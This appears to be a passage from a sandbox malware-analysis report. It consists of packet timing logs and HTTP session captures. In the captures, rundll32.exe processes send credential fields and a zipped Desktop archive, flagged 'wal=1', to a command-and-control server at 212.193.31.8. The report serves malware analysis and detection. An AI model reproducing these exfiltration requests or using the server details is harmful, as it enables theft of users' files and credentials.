                                                                      Dec 23, 2024 06:38:40.093667984 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093681097 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093705893 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093722105 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093740940 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093755007 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:40.093767881 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.415358067 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.535375118 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.535706043 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.535706043 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.535809994 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.535830975 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.535847902 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.535866976 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.535897017 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.535917044 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.535936117 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.535952091 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.535969973 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536040068 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536041021 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536041021 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536078930 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536078930 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536098003 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536124945 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536145926 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536170959 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536192894 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536212921 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536233902 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536253929 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536277056 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536295891 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536317110 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536350965 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536370039 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536400080 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536400080 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536426067 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536447048 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536494970 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536494970 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536528111 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536546946 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536565065 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536581039 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536602974 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536623955 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536640882 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536672115 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536700010 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536717892 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536741018 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536760092 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536783934 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536802053 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.536818981 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542493105 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542511940 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542538881 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542557001 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542574883 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542602062 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542618036 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542638063 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542665005 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542685032 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542717934 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542717934 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542740107 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542763948 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542790890 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542807102 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542834044 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542860985 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542879105 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542901993 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542918921 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542942047 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542959929 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542974949 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.542995930 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543024063 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543041945 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543056965 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543083906 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543101072 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543127060 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543154955 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543173075 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543188095 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543209076 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543231010 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543273926 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543273926 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543308973 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543308973 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543354988 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543749094 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543749094 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543749094 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543749094 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543749094 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543750048 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543750048 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543750048 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543852091 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543853045 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543853045 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543853045 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543853045 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543853045 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543910027 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543910027 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543929100 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543947935 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.543966055 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544023991 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544023991 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544023991 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544068098 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544068098 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544086933 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544106960 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544130087 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544157982 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544176102 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544210911 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544210911 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544236898 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.544276953 CET4974180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:47.655687094 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.655719995 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.655749083 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656061888 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656110048 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656137943 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656166077 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656193018 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656220913 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656246901 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656274080 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656307936 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656335115 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656361103 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656387091 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656419039 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656445026 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656497002 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656523943 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656550884 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656589985 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656616926 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656644106 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656675100 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656702042 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656728029 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.656754971 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.775856972 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.775899887 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.775929928 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.775958061 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.775985956 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776014090 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776041985 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776068926 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776097059 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776124001 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776150942 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776177883 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776235104 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776262999 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776289940 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776318073 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776345015 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776371956 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776398897 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776457071 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776484966 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776511908 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776539087 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776566982 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776593924 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776621103 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776648998 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776675940 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776704073 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776731014 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776788950 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776817083 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776844025 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776871920 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776900053 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776926994 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776958942 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.776987076 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777014971 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777041912 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777069092 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777096033 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777123928 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777151108 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777178049 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777204990 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777231932 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777259111 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777287006 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777314901 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777340889 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777369022 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777395964 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777422905 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777472973 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777517080 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777544975 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777571917 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777600050 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777626038 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777653933 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777681112 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777708054 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777734995 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777762890 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777791977 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777820110 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777846098 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777873993 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777900934 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777929068 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777956009 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.777982950 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778009892 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778037071 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778064013 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778090954 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778117895 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778143883 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778196096 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778228998 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778255939 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778284073 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778311014 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778338909 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778366089 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778393030 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778420925 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778446913 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778474092 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778501034 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778527975 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778553963 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778580904 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778609037 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778635025 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778661013 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778687954 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778714895 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778742075 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778772116 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778799057 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778825045 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778852940 CET8049741212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:47.778901100 CET8049741212.193.31.8192.168.2.4
                                                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                      Dec 23, 2024 06:38:26.150477886 CET | 1.1.1.1 | 192.168.2.4 | 0xd774 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                                                                      Dec 23, 2024 06:38:26.150477886 CET | 1.1.1.1 | 192.168.2.4 | 0xd774 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
                                                                      • 212.193.31.8
                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      0 | 192.168.2.4 | 49730 | 212.193.31.8 | 80 | 6868 | C:\Windows\System32\rundll32.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 23, 2024 06:38:02.722656012 CET | 178 | OUT | POST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 212.193.31.8
                                                                      Content-Length: 21
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                                                      Data Ascii: id=246122658369&cred=


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      1 | 192.168.2.4 | 49731 | 212.193.31.8 | 80 | 6836 | C:\Windows\System32\rundll32.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 23, 2024 06:38:02.734761953 CET | 178 | OUT | POST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 212.193.31.8
                                                                      Content-Length: 21
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                                                      Data Ascii: id=246122658369&cred=


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      2 | 192.168.2.4 | 49732 | 212.193.31.8 | 80 | 2836 | C:\Windows\System32\rundll32.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 23, 2024 06:38:08.873013973 CET | 178 | OUT | POST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 212.193.31.8
                                                                      Content-Length: 21
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                                                      Data Ascii: id=246122658369&cred=


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      3 | 192.168.2.4 | 49739 | 212.193.31.8 | 80 | 6836 | C:\Windows\System32\rundll32.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 23, 2024 06:38:39.731342077 CET | 174 | OUT | POST /3ofn3jf3e2ljk2/index.php?wal=1 HTTP/1.1
                                                                      Content-Type: multipart/form-data; boundary=----MzA4NA==
                                                                      Host: 212.193.31.8
                                                                      Content-Length: 3244
                                                                      Cache-Control: no-cache
                                                                      Dec 23, 2024 06:38:39.731420994 CET | 140 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 4d 7a 41 34 4e 41 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
                                                                      Data Ascii: ------MzA4NA==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      4 | 192.168.2.4 | 49740 | 212.193.31.8 | 80 | 6868 | C:\Windows\System32\rundll32.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 23, 2024 06:38:39.748743057 CET | 174 | OUT | POST /3ofn3jf3e2ljk2/index.php?wal=1 HTTP/1.1
                                                                      Content-Type: multipart/form-data; boundary=----MzA4NA==
                                                                      Host: 212.193.31.8
                                                                      Content-Length: 3244
                                                                      Cache-Control: no-cache
                                                                      Dec 23, 2024 06:38:39.748800993 CET | 140 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 4d 7a 41 34 4e 41 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
                                                                      Data Ascii: ------MzA4NA==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      5 | 192.168.2.4 | 49741 | 212.193.31.8 | 80 | 2836 | C:\Windows\System32\rundll32.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 23, 2024 06:38:47.535706043 CET | 174 | OUT | POST /3ofn3jf3e2ljk2/index.php?wal=1 HTTP/1.1
                                                                      Content-Type: multipart/form-data; boundary=----MzA4NA==
                                                                      Host: 212.193.31.8
                                                                      Content-Length: 3244
                                                                      Cache-Control: no-cache
                                                                      Dec 23, 2024 06:38:47.535809994 CET | 140 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 4d 7a 41 34 4e 41 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
